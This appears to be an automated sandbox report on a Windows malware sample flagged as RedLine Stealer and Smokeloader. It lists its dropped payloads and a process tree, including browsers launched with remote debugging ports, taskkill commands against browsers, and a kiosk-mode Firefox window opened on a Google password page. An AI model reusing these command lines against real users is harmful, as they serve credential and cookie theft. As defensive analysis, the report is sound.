Source: file.exe Static PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
Yara signature match
Source: 00000012.00000002.3325152088.0000000000F4C000.00000040.00000020.00020000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_RedLineStealer_ed346e4c reference_sample = a91c1d3965f11509d1c1125210166b824a79650f29ea203983fffb5f8900858c, os = windows, severity = x86, creation_date = 2022-02-17, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.RedLineStealer, fingerprint = 834c13b2e0497787e552bb1318664496d286e7cf57b4661e5e07bf1cffe61b82, id = ed346e4c-7890-41ee-8648-f512682fe20e, last_modified = 2022-04-12
Source: 00000012.00000002.3323737933.0000000000D70000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_Smokeloader_3687686f reference_sample = 8b3014ecd962a335b246f6c70fc820247e8bdaef98136e464b1fdb824031eef7, os = windows, severity = x86, creation_date = 2021-07-21, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Smokeloader, fingerprint = 0f483f9f79ae29b944825c1987366d7b450312f475845e2242a07674580918bc, id = 3687686f-8fbf-4f09-9afa-612ee65dc86c, last_modified = 2021-08-23
Source: file.exe Static PE information: Section: loxwmvpm ZLIB complexity 0.9947971873107208
Source: random[1].exe.17.dr Static PE information: Section: loxwmvpm ZLIB complexity 0.9947971873107208
Source: 815f2a8fe8.exe.17.dr Static PE information: Section: loxwmvpm ZLIB complexity 0.9947971873107208
Source: random[1].exe1.17.dr Static PE information: Section: ZLIB complexity 0.9975129757785467
Source: random[1].exe1.17.dr Static PE information: Section: kcjzlwkt ZLIB complexity 0.9946914618549823
Source: feb3d39b6a.exe.17.dr Static PE information: Section: ZLIB complexity 0.9975129757785467
Source: feb3d39b6a.exe.17.dr Static PE information: Section: kcjzlwkt ZLIB complexity 0.9946914618549823
Source: classification engine Classification label: mal100.troj.spyw.evad.winEXE@81/79@50/17
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_6C537030 GetLastError,FormatMessageA,__acrt_iob_func,__acrt_iob_func,__acrt_iob_func,fflush,LocalFree, 0_2_6C537030
Source: C:\Users\user\Desktop\file.exe File created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\T9RRWRNL\MO0A388L.htm Jump to behavior
Source: C:\Windows\System32\conhost.exe Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:5356:120:WilError_03
Source: C:\Users\user\AppData\Local\Temp\1013585001\57a07eec2d.exe Mutant created: NULL
Source: C:\Windows\System32\conhost.exe Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:6432:120:WilError_03
Source: C:\Windows\System32\conhost.exe Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:5820:120:WilError_03
Source: C:\Windows\System32\conhost.exe Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7220:120:WilError_03
Source: C:\Windows\System32\conhost.exe Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:1268:120:WilError_03
Source: C:\Windows\System32\conhost.exe Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7152:120:WilError_03
Source: C:\Windows\System32\conhost.exe Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:5852:120:WilError_03
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Mutant created: \Sessions\1\BaseNamedObjects\006700e5a2ab05704bbb0c589b88924d
Source: C:\Users\user\Documents\JKECGDBFCB.exe File created: C:\Users\user\AppData\Local\Temp\abc3bc1985 Jump to behavior
Source: C:\Windows\SysWOW64\taskkill.exe WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT __PATH, ProcessId, CSName, Caption, SessionId, ThreadCount, WorkingSetSize, KernelModeTime, UserModeTime, ParentProcessId FROM Win32_Process
Source: C:\Windows\SysWOW64\taskkill.exe WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT __PATH, ProcessId, CSName, Caption, SessionId, ThreadCount, WorkingSetSize, KernelModeTime, UserModeTime, ParentProcessId FROM Win32_Process
Source: C:\Windows\SysWOW64\taskkill.exe WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT __PATH, ProcessId, CSName, Caption, SessionId, ThreadCount, WorkingSetSize, KernelModeTime, UserModeTime, ParentProcessId FROM Win32_Process
Source: C:\Windows\SysWOW64\taskkill.exe WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT __PATH, ProcessId, CSName, Caption, SessionId, ThreadCount, WorkingSetSize, KernelModeTime, UserModeTime, ParentProcessId FROM Win32_Process
Source: C:\Windows\SysWOW64\taskkill.exe WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT __PATH, ProcessId, CSName, Caption, SessionId, ThreadCount, WorkingSetSize, KernelModeTime, UserModeTime, ParentProcessId FROM Win32_Process
Source: C:\Windows\SysWOW64\taskkill.exe WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT __PATH, ProcessId, CSName, Caption, SessionId, ThreadCount, WorkingSetSize, KernelModeTime, UserModeTime, ParentProcessId FROM Win32_Process
Source: C:\Windows\System32\conhost.exe WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT __PATH, ProcessId, CSName, Caption, SessionId, ThreadCount, WorkingSetSize, KernelModeTime, UserModeTime, ParentProcessId FROM Win32_Process
Source: C:\Users\user\Desktop\file.exe File read: C:\Users\user\Desktop\desktop.ini Jump to behavior
Source: C:\Users\user\Desktop\file.exe Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers Jump to behavior
Source: file.exe, 00000000.00000002.2619103776.000000006C70F000.00000002.00000001.01000000.00000009.sdmp, file.exe, 00000000.00000002.2611716092.000000000566C000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000002.2618267474.0000000061EB7000.00000002.00001000.00020000.00000000.sdmp Binary or memory string: UPDATE %Q.sqlite_master SET tbl_name = %Q, name = CASE WHEN type='table' THEN %Q WHEN name LIKE 'sqliteX_autoindex%%' ESCAPE 'X' AND type='index' THEN 'sqlite_autoindex_' || %Q || substr(name,%d+18) ELSE name END WHERE tbl_name=%Q COLLATE nocase AND (type='table' OR type='index' OR type='trigger');
Source: file.exe, 00000000.00000002.2619103776.000000006C70F000.00000002.00000001.01000000.00000009.sdmp, file.exe, 00000000.00000002.2611716092.000000000566C000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000002.2618267474.0000000061EB7000.00000002.00001000.00020000.00000000.sdmp Binary or memory string: CREATE TABLE %Q.'%q_docsize'(docid INTEGER PRIMARY KEY, size BLOB);
Source: file.exe, 00000000.00000002.2619103776.000000006C70F000.00000002.00000001.01000000.00000009.sdmp, file.exe, 00000000.00000002.2611716092.000000000566C000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000002.2618267474.0000000061EB7000.00000002.00001000.00020000.00000000.sdmp Binary or memory string: CREATE TABLE IF NOT EXISTS %Q.'%q_stat'(id INTEGER PRIMARY KEY, value BLOB);
Source: file.exe, 00000000.00000002.2619103776.000000006C70F000.00000002.00000001.01000000.00000009.sdmp, file.exe, 00000000.00000002.2611716092.000000000566C000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000002.2618267474.0000000061EB7000.00000002.00001000.00020000.00000000.sdmp Binary or memory string: CREATE TABLE %Q.'%q_segdir'(level INTEGER,idx INTEGER,start_block INTEGER,leaves_end_block INTEGER,end_block INTEGER,root BLOB,PRIMARY KEY(level, idx));
Source: file.exe, 00000000.00000002.2619103776.000000006C70F000.00000002.00000001.01000000.00000009.sdmp, file.exe, 00000000.00000002.2611716092.000000000566C000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000002.2618267474.0000000061EB7000.00000002.00001000.00020000.00000000.sdmp Binary or memory string: INSERT INTO %Q.sqlite_master VALUES('index',%Q,%Q,#%d,%Q);
Source: file.exe, 00000000.00000002.2619103776.000000006C70F000.00000002.00000001.01000000.00000009.sdmp, file.exe, 00000000.00000002.2611716092.000000000566C000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000002.2618267474.0000000061EB7000.00000002.00001000.00020000.00000000.sdmp Binary or memory string: CREATE TABLE %Q.'%q_segments'(blockid INTEGER PRIMARY KEY, block BLOB);
Source: file.exe, 00000000.00000002.2611716092.000000000566C000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000002.2618267474.0000000061EB7000.00000002.00001000.00020000.00000000.sdmp Binary or memory string: CREATE TABLE x(addr INT,opcode TEXT,p1 INT,p2 INT,p3 INT,p4 TEXT,p5 INT,comment TEXT,subprog TEXT,stmt HIDDEN);
Source: file.exe, 00000000.00000003.2362973494.0000000005549000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2225538035.0000000005555000.00000004.00000020.00020000.00000000.sdmp, feb3d39b6a.exe, 00000013.00000003.2978944950.0000000005603000.00000004.00000800.00020000.00000000.sdmp, feb3d39b6a.exe, 00000013.00000003.2954831207.00000000055F4000.00000004.00000800.00020000.00000000.sdmp, feb3d39b6a.exe, 00000013.00000003.2955299029.00000000055D5000.00000004.00000800.00020000.00000000.sdmp, feb3d39b6a.exe, 00000016.00000003.3123638554.0000000005675000.00000004.00000800.00020000.00000000.sdmp, feb3d39b6a.exe, 00000016.00000003.3181790785.000000000568D000.00000004.00000800.00020000.00000000.sdmp, feb3d39b6a.exe, 00000016.00000003.3122063165.0000000005694000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: CREATE TABLE password_notes (id INTEGER PRIMARY KEY AUTOINCREMENT, parent_id INTEGER NOT NULL REFERENCES logins ON UPDATE CASCADE ON DELETE CASCADE DEFERRABLE INITIALLY DEFERRED, key VARCHAR NOT NULL, value BLOB, date_created INTEGER NOT NULL, confidential INTEGER, UNIQUE (parent_id, key));
Source: file.exe, 00000000.00000002.2611716092.000000000566C000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000002.2618267474.0000000061EB7000.00000002.00001000.00020000.00000000.sdmp Binary or memory string: CREATE TABLE "%w"."%w_parent"(nodeno INTEGER PRIMARY KEY,parentnode);
Source: file.exe, 00000000.00000002.2611716092.000000000566C000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000002.2618267474.0000000061EB7000.00000002.00001000.00020000.00000000.sdmp Binary or memory string: CREATE TABLE x(type TEXT,schema TEXT,name TEXT,wr INT,subprog TEXT,stmt HIDDEN);
Source: file.exe ReversingLabs: Detection: 44%
Source: file.exe String found in binary or memory: 3Cannot find '%s'. Please, re-install this application
Source: unknown Process created: C:\Users\user\Desktop\file.exe "C:\Users\user\Desktop\file.exe"
Source: C:\Users\user\Desktop\file.exe Process created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --remote-debugging-port=9229 --profile-directory=""
Source: C:\Program Files\Google\Chrome\Application\chrome.exe Process created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2212 --field-trial-handle=2188,i,15960118764886269658,6532933888206594195,262144 /prefetch:8
Source: C:\Users\user\Desktop\file.exe Process created: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --remote-debugging-port=9229 --profile-directory=""
Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe Process created: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-GB --service-sandbox-type=none --mojo-platform-channel-handle=2456 --field-trial-handle=2064,i,2810652409012286938,13931137755931519812,262144 /prefetch:3
Source: unknown Process created: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --remote-debugging-port=9229 --profile-directory --flag-switches-begin --flag-switches-end --disable-nacl --do-not-de-elevate
Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe Process created: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-GB --service-sandbox-type=none --mojo-platform-channel-handle=2276 --field-trial-handle=2124,i,13202406823747030599,15920737629403327339,262144 /prefetch:3
Source: C:\Users\user\Desktop\file.exe Process created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\system32\cmd.exe" /c start "" "C:\Users\user\Documents\JKECGDBFCB.exe"
Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Users\user\Documents\JKECGDBFCB.exe "C:\Users\user\Documents\JKECGDBFCB.exe"
Source: C:\Users\user\Documents\JKECGDBFCB.exe Process created: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe "C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe"
Source: unknown Process created: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe
Source: unknown Process created: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Process created: C:\Users\user\AppData\Local\Temp\1013581001\2533b4b8c7.exe "C:\Users\user\AppData\Local\Temp\1013581001\2533b4b8c7.exe"
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Process created: C:\Users\user\AppData\Local\Temp\1013582001\feb3d39b6a.exe "C:\Users\user\AppData\Local\Temp\1013582001\feb3d39b6a.exe"
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Process created: C:\Users\user\AppData\Local\Temp\1013583001\815f2a8fe8.exe "C:\Users\user\AppData\Local\Temp\1013583001\815f2a8fe8.exe"
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Process created: C:\Users\user\AppData\Local\Temp\1013584001\0d957dbf73.exe "C:\Users\user\AppData\Local\Temp\1013584001\0d957dbf73.exe"
Source: unknown Process created: C:\Users\user\AppData\Local\Temp\1013582001\feb3d39b6a.exe "C:\Users\user\AppData\Local\Temp\1013582001\feb3d39b6a.exe"
Source: C:\Users\user\AppData\Local\Temp\1013584001\0d957dbf73.exe Process created: C:\Windows\SysWOW64\taskkill.exe taskkill /F /IM firefox.exe /T
Source: C:\Windows\SysWOW64\taskkill.exe Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\AppData\Local\Temp\1013584001\0d957dbf73.exe Process created: C:\Windows\SysWOW64\taskkill.exe taskkill /F /IM chrome.exe /T
Source: C:\Windows\SysWOW64\taskkill.exe Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\AppData\Local\Temp\1013584001\0d957dbf73.exe Process created: C:\Windows\SysWOW64\taskkill.exe taskkill /F /IM msedge.exe /T
Source: C:\Windows\SysWOW64\taskkill.exe Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\AppData\Local\Temp\1013584001\0d957dbf73.exe Process created: C:\Windows\SysWOW64\taskkill.exe taskkill /F /IM opera.exe /T
Source: C:\Windows\SysWOW64\taskkill.exe Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\AppData\Local\Temp\1013584001\0d957dbf73.exe Process created: C:\Windows\SysWOW64\taskkill.exe taskkill /F /IM brave.exe /T
Source: C:\Windows\SysWOW64\taskkill.exe Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\AppData\Local\Temp\1013584001\0d957dbf73.exe Process created: C:\Program Files\Mozilla Firefox\firefox.exe "C:\Program Files\Mozilla Firefox\firefox.exe" --kiosk "https://youtube.com/account?=https://accounts.google.com/v3/signin/challenge/pwd" --no-default-browser-check --disable-popup-blocking
Source: unknown Process created: C:\Program Files\Mozilla Firefox\firefox.exe "C:\Program Files\Mozilla Firefox\firefox.exe" --kiosk https://youtube.com/account?=https://accounts.google.com/v3/signin/challenge/pwd --no-default-browser-check --disable-popup-blocking --attempting-deelevation
Source: C:\Program Files\Mozilla Firefox\firefox.exe Process created: C:\Program Files\Mozilla Firefox\firefox.exe "C:\Program Files\Mozilla Firefox\firefox.exe" --kiosk https://youtube.com/account?=https://accounts.google.com/v3/signin/challenge/pwd --no-default-browser-check --disable-popup-blocking
Source: C:\Program Files\Mozilla Firefox\firefox.exe Process created: C:\Program Files\Mozilla Firefox\firefox.exe "C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel=2192 -parentBuildID 20230927232528 -prefsHandle 2132 -prefMapHandle 2128 -prefsLen 25308 -prefMapSize 237879 -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - {9f89380b-e895-40d1-9424-18fcfa5174fc} 1992 "\\.\pipe\gecko-crash-server-pipe.1992" 132aa86e310 socket
Source: unknown Process created: C:\Users\user\AppData\Local\Temp\1013583001\815f2a8fe8.exe "C:\Users\user\AppData\Local\Temp\1013583001\815f2a8fe8.exe"
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Process created: C:\Users\user\AppData\Local\Temp\1013585001\57a07eec2d.exe "C:\Users\user\AppData\Local\Temp\1013585001\57a07eec2d.exe"
Source: C:\Program Files\Mozilla Firefox\firefox.exe Process created: C:\Program Files\Mozilla Firefox\firefox.exe "C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel=4400 -parentBuildID 20230927232528 -prefsHandle 3648 -prefMapHandle 3968 -prefsLen 30974 -prefMapSize 237879 -appDir "C:\Program Files\Mozilla Firefox\browser" - {e2f51042-99a7-4863-8fea-e445d15025a5} 1992 "\\.\pipe\gecko-crash-server-pipe.1992" 132bd2afe10 rdd
Source: unknown Process created: C:\Users\user\AppData\Local\Temp\1013584001\0d957dbf73.exe "C:\Users\user\AppData\Local\Temp\1013584001\0d957dbf73.exe"
Source: C:\Users\user\AppData\Local\Temp\1013584001\0d957dbf73.exe Process created: C:\Windows\SysWOW64\taskkill.exe taskkill /F /IM firefox.exe /T
Source: C:\Windows\SysWOW64\taskkill.exe Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: unknown Process created: C:\Users\user\AppData\Local\Temp\1013585001\57a07eec2d.exe "C:\Users\user\AppData\Local\Temp\1013585001\57a07eec2d.exe"
Source: C:\Users\user\Desktop\file.exe Process created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --remote-debugging-port=9229 --profile-directory="" Jump to behavior
Source: C:\Users\user\Desktop\file.exe Process created: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --remote-debugging-port=9229 --profile-directory="" Jump to behavior
Source: C:\Users\user\Desktop\file.exe Process created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\system32\cmd.exe" /c start "" "C:\Users\user\Documents\JKECGDBFCB.exe" Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe Process created: unknown unknown Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe Process created: unknown unknown Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe Process created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2212 --field-trial-handle=2188,i,15960118764886269658,6532933888206594195,262144 /prefetch:8 Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe Process created: unknown unknown Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe Process created: unknown unknown Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe Process created: unknown unknown Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe Process created: unknown unknown Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe Process created: unknown unknown Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe Process created: C:\Users\user\Documents\JKECGDBFCB.exe "C:\Users\user\Documents\JKECGDBFCB.exe" Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe Process created: unknown unknown Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe Process created: unknown unknown Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe Process created: unknown unknown Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe Process created: unknown unknown Jump to behavior
Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe Process created: unknown unknown Jump to behavior
Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe Process created: unknown unknown Jump to behavior
Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe Process created: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-GB --service-sandbox-type=none --mojo-platform-channel-handle=2456 --field-trial-handle=2064,i,2810652409012286938,13931137755931519812,262144 /prefetch:3 Jump to behavior
Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe Process created: unknown unknown Jump to behavior
Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe Process created: unknown unknown Jump to behavior
Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe Process created: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-GB --service-sandbox-type=none --mojo-platform-channel-handle=2276 --field-trial-handle=2124,i,13202406823747030599,15920737629403327339,262144 /prefetch:3 Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Users\user\Documents\JKECGDBFCB.exe "C:\Users\user\Documents\JKECGDBFCB.exe" Jump to behavior
Source: C:\Users\user\Documents\JKECGDBFCB.exe Process created: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe "C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe" Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Process created: C:\Users\user\AppData\Local\Temp\1013581001\2533b4b8c7.exe "C:\Users\user\AppData\Local\Temp\1013581001\2533b4b8c7.exe"
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Process created: C:\Users\user\AppData\Local\Temp\1013582001\feb3d39b6a.exe "C:\Users\user\AppData\Local\Temp\1013582001\feb3d39b6a.exe"
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Process created: C:\Users\user\AppData\Local\Temp\1013583001\815f2a8fe8.exe "C:\Users\user\AppData\Local\Temp\1013583001\815f2a8fe8.exe"
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Process created: C:\Users\user\AppData\Local\Temp\1013584001\0d957dbf73.exe "C:\Users\user\AppData\Local\Temp\1013584001\0d957dbf73.exe"
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Process created: C:\Users\user\AppData\Local\Temp\1013585001\57a07eec2d.exe "C:\Users\user\AppData\Local\Temp\1013585001\57a07eec2d.exe"
Source: C:\Users\user\AppData\Local\Temp\1013584001\0d957dbf73.exe Process created: C:\Windows\SysWOW64\taskkill.exe taskkill /F /IM firefox.exe /T
Source: C:\Users\user\AppData\Local\Temp\1013584001\0d957dbf73.exe Process created: C:\Windows\SysWOW64\taskkill.exe taskkill /F /IM chrome.exe /T
Source: C:\Users\user\AppData\Local\Temp\1013584001\0d957dbf73.exe Process created: C:\Windows\SysWOW64\taskkill.exe taskkill /F /IM msedge.exe /T
Source: C:\Users\user\AppData\Local\Temp\1013584001\0d957dbf73.exe Process created: C:\Windows\SysWOW64\taskkill.exe taskkill /F /IM opera.exe /T
Source: C:\Users\user\AppData\Local\Temp\1013584001\0d957dbf73.exe Process created: C:\Windows\SysWOW64\taskkill.exe taskkill /F /IM brave.exe /T
Source: C:\Users\user\AppData\Local\Temp\1013584001\0d957dbf73.exe Process created: C:\Program Files\Mozilla Firefox\firefox.exe "C:\Program Files\Mozilla Firefox\firefox.exe" --kiosk "https://youtube.com/account?=https://accounts.google.com/v3/signin/challenge/pwd" --no-default-browser-check --disable-popup-blocking
Source: C:\Program Files\Mozilla Firefox\firefox.exe Process created: C:\Program Files\Mozilla Firefox\firefox.exe "C:\Program Files\Mozilla Firefox\firefox.exe" --kiosk https://youtube.com/account?=https://accounts.google.com/v3/signin/challenge/pwd --no-default-browser-check --disable-popup-blocking
Source: C:\Program Files\Mozilla Firefox\firefox.exe Process created: C:\Program Files\Mozilla Firefox\firefox.exe "C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel=2192 -parentBuildID 20230927232528 -prefsHandle 2132 -prefMapHandle 2128 -prefsLen 25308 -prefMapSize 237879 -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - {9f89380b-e895-40d1-9424-18fcfa5174fc} 1992 "\\.\pipe\gecko-crash-server-pipe.1992" 132aa86e310 socket
Source: C:\Program Files\Mozilla Firefox\firefox.exe Process created: unknown unknown
Source: C:\Program Files\Mozilla Firefox\firefox.exe Process created: unknown unknown
Source: C:\Program Files\Mozilla Firefox\firefox.exe Process created: C:\Program Files\Mozilla Firefox\firefox.exe "C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel=4400 -parentBuildID 20230927232528 -prefsHandle 3648 -prefMapHandle 3968 -prefsLen 30974 -prefMapSize 237879 -appDir "C:\Program Files\Mozilla Firefox\browser" - {e2f51042-99a7-4863-8fea-e445d15025a5} 1992 "\\.\pipe\gecko-crash-server-pipe.1992" 132bd2afe10 rdd
Source: C:\Program Files\Mozilla Firefox\firefox.exe Process created: unknown unknown
Source: C:\Users\user\AppData\Local\Temp\1013584001\0d957dbf73.exe Process created: C:\Windows\SysWOW64\taskkill.exe taskkill /F /IM firefox.exe /T
Source: C:\Users\user\Desktop\file.exe Section loaded: apphelp.dll Jump to behavior
Source: C:\Users\user\Desktop\file.exe Section loaded: winmm.dll Jump to behavior
Source: C:\Users\user\Desktop\file.exe Section loaded: sspicli.dll Jump to behavior
Source: C:\Users\user\Desktop\file.exe Section loaded: wininet.dll Jump to behavior
Source: C:\Users\user\Desktop\file.exe Section loaded: rstrtmgr.dll Jump to behavior
Source: C:\Users\user\Desktop\file.exe Section loaded: ncrypt.dll Jump to behavior
Source: C:\Users\user\Desktop\file.exe Section loaded: ntasn1.dll Jump to behavior
Source: C:\Users\user\Desktop\file.exe Section loaded: iertutil.dll Jump to behavior
Source: C:\Users\user\Desktop\file.exe Section loaded: windows.storage.dll Jump to behavior
Source: C:\Users\user\Desktop\file.exe Section loaded: wldp.dll Jump to behavior
Source: C:\Users\user\Desktop\file.exe Section loaded: profapi.dll Jump to behavior
Source: C:\Users\user\Desktop\file.exe Section loaded: kernel.appcore.dll Jump to behavior
Source: C:\Users\user\Desktop\file.exe Section loaded: ondemandconnroutehelper.dll Jump to behavior
Source: C:\Users\user\Desktop\file.exe Section loaded: winhttp.dll Jump to behavior
Source: C:\Users\user\Desktop\file.exe Section loaded: mswsock.dll Jump to behavior
Source: C:\Users\user\Desktop\file.exe Section loaded: iphlpapi.dll Jump to behavior
Source: C:\Users\user\Desktop\file.exe Section loaded: winnsi.dll Jump to behavior
Source: C:\Users\user\Desktop\file.exe Section loaded: urlmon.dll Jump to behavior
Source: C:\Users\user\Desktop\file.exe Section loaded: srvcli.dll Jump to behavior
Source: C:\Users\user\Desktop\file.exe Section loaded: netutils.dll Jump to behavior
Source: C:\Users\user\Desktop\file.exe Section loaded: dpapi.dll Jump to behavior
Source: C:\Users\user\Desktop\file.exe Section loaded: cryptbase.dll Jump to behavior
Source: C:\Users\user\Desktop\file.exe Section loaded: dnsapi.dll Jump to behavior
Source: C:\Users\user\Desktop\file.exe Section loaded: rasadhlp.dll Jump to behavior
Source: C:\Users\user\Desktop\file.exe Section loaded: fwpuclnt.dll Jump to behavior
Source: C:\Users\user\Desktop\file.exe Section loaded: ntmarta.dll Jump to behavior
Source: C:\Users\user\Desktop\file.exe Section loaded: mozglue.dll Jump to behavior
Source: C:\Users\user\Desktop\file.exe Section loaded: wsock32.dll Jump to behavior
Source: C:\Users\user\Desktop\file.exe Section loaded: vcruntime140.dll Jump to behavior
Source: C:\Users\user\Desktop\file.exe Section loaded: msvcp140.dll Jump to behavior
Source: C:\Users\user\Desktop\file.exe Section loaded: vcruntime140.dll Jump to behavior
Source: C:\Users\user\Desktop\file.exe Section loaded: uxtheme.dll Jump to behavior
Source: C:\Users\user\Desktop\file.exe Section loaded: propsys.dll Jump to behavior
Source: C:\Users\user\Desktop\file.exe Section loaded: edputil.dll Jump to behavior
Source: C:\Users\user\Desktop\file.exe Section loaded: windows.staterepositoryps.dll Jump to behavior
Source: C:\Users\user\Desktop\file.exe Section loaded: wintypes.dll Jump to behavior
Source: C:\Users\user\Desktop\file.exe Section loaded: appresolver.dll Jump to behavior
Source: C:\Users\user\Desktop\file.exe Section loaded: bcp47langs.dll Jump to behavior
